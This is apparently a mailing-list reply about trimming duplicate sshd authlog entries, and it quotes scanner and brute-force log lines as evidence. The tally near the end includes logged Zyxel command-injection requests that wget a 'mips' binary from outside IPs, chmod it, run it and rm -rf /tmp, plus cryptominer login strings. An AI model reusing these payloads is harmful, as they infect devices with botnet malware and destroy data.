On 2023/08/18 17:39, Tobias Heider wrote:
> Hi,
>
> I was looking at my authlog today and as expected on a server exposed on the
> public internet it is filled with random scanners and brute force attacks.
> One thing I noticed is that there is a lot of information we log multiple
> times for a each failed connection.
>
> Some examples below:
>
> sshd[6216]: error: kex_exchange_identification: banner line contains invalid
> characters
> sshd[6216]: banner exchange: Connection from xx.97.73.149 port 64744: invalid
> format
> sshd[68416]: error: kex_exchange_identification: banner line contains invalid
> characters
> sshd[68416]: banner exchange: Connection from xx.97.73.149 port 63955:
> invalid format
>
> There are a few more parsing errors like this that result in a print of the
> exact
> issue error followed by 'goto invalid' which causes the more general "invalid
> format"
> message. I think "invalid format" is enough information in most cases.
>
> sshd[50752]: error: kex_exchange_identification: Connection closed by remote
> host
> sshd[50752]: Connection closed by xx.94.81.243 port 61000
>
> Same as above, the kex_exchange_identification doesn't really add anything.
>
> sshd[51579]: Invalid user tom from xx.134.191.142 port 35480
> sshd[51579]: Received disconnect from xx.134.191.142 port 35480:11: Bye Bye
> [preauth]
> sshd[51579]: Disconnected from invalid user tom xx.134.191.142 port 35480
> [preauth]
> sshd[94857]: Invalid user long from xx.97.173.1 port 51140
> sshd[94857]: Received disconnect from xx.97.173.1 port 51140:11: Bye Bye
> [preauth]
> sshd[94857]: Disconnected from invalid user long xx.97.173.1 port 51140
> [preauth]
>
> Here the "Disconnected" line contains all the info from "Invalid user" line.
> Those invalid user messages make up the largest part of my log file,
> so deduplicating them makes a huge difference.
>
> Below is a diff to make some of those log to debug if the same information
> is also logged elsewhere.
> Is there some general interest in diffs to clean this up a bit?
There are some messages which don't show up in the "Disconnected from"
line which may possibly give some clues about the source of connections,
so might be of interest. If someone does want to log them, going all
the way to debug is going to result in a *lot* more useless lines being
logged.
So if they are getting squelched I think they would better under verbose
rather than debug.
examples...
sshd[2722]: Connection from 20.168.51.56 port 54850 on 195.95.187.26 port 22
rdomain "0"
sshd[2722]: error: Received disconnect from 20.168.51.56 port 54850:3:
com.jcraft.jsch.JSchException: Auth fail [preauth]
sshd[2722]: Disconnected from authenticating user root 20.168.51.56 port 54850
[preauth]
sshd[50247]: Connection from 218.92.0.22 port 36077 on 195.95.187.184 port 22
rdomain "0"
sshd[50247]: Received disconnect from 218.92.0.22 port 36077:11: [preauth]
sshd[50247]: Disconnected from authenticating user root 218.92.0.22 port 36077
[preauth]
sshd[12117]: Connection from 222.71.84.234 port 53262 on 195.95.187.26 port 22
rdomain "0"
sshd[12117]: Invalid user A@0599343813A@0599343813A@0599343813 from
222.71.84.234 port 53262
sshd[12117]: Received disconnect from 222.71.84.234 port 53262:11: Normal
Shutdown, Thank you for playing [preauth]
sshd[12117]: Disconnected from invalid user
A@0599343813A@0599343813A@0599343813 222.71.84.234 port 53262 [preauth]
sshd[83269]: Connection from 143.244.50.173 port 46078 on 195.95.187.28 port 22
rdomain "0"
sshd[83269]: Invalid user admin from 143.244.50.173 port 46078
sshd[83269]: Received disconnect from 143.244.50.173 port 46078:11: end
[preauth]
sshd[83269]: Disconnected from invalid user admin 143.244.50.173 port 46078
[preauth]
and I have all sorts in "kex_exchange_identification: client sent
invalid protocol identifier"
1 "CONNECT api.ipify.org:443 HTTP/1.1"
1 "GET / HTTP/1.0"
1 "GET /.git/HEAD HTTP/1.1"
1 "GET /0bef HTTP/1.0"
1 "GET /CSS/Miniweb.css HTTP/1.1"
1 "GET /HNAP1 HTTP/1.1"
1 "GET /Portal0000.htm HTTP/1.1"
1 "GET /__Additional HTTP/1.1"
1 "GET
/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://146.19.191.108/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;";
1 "GET /evox/about HTTP/1.1"
1 "GET /jPOS HTTP/1.1"
1 "GET /manager/html HTTP/1.1"
1 "GET /manager/text/list HTTP/1.1"
1 "GET /start.cfm HTTP/1.1"
1 "HEAD / HTTP/1.1"
1 "POST /sdk HTTP/1.1"
1 "SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1"
1 "\376^H\001adminSSH-2.0-PuTTY_Release_0.78"
1 "{"id": 1, "method": "mining.subscribe", "params": ["MinerName/1.0.0",
"EthereumStratum/1.0.0"]}"
1 "{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.1"]}"
1
"{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46Rgo4egSbN6bXvDAdu9HGAzqHdWrote1L1yiptBRySqNzMZtDbhbSf9dQLUcgpy6GBcwfvuJn54JVTK4vDGetKFMeoM4XZ","pass":"x","agent":"XMRig/6.15.3
(Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019","algo":["cn/"
1
"{"id":1,"method":"eth_submitLogin","worker":"igwrcvap","params":["0xb850910e0ebe0f93976921effa663a647e50de4b","x"],"jsonrpc":"2.0"}"
2 "CONNECT google.com:443 HTTP/1.1"
2 "GET
/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.110.33.164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;";
2 "POST / HTTP/1.1"
2 "\376^H\001adminSSH-2.0-OpenSSH_7.4"
3 "GET /.env HTTP/1.1"
3 "GET /private/api/v1/service/premaster HTTP/1.1"
4 "REQMOD icap://icap-server.net/server?arg=87 ICAP/1.0"
27 "MGLNDD_xx"
31 "GET / HTTP/1.1"
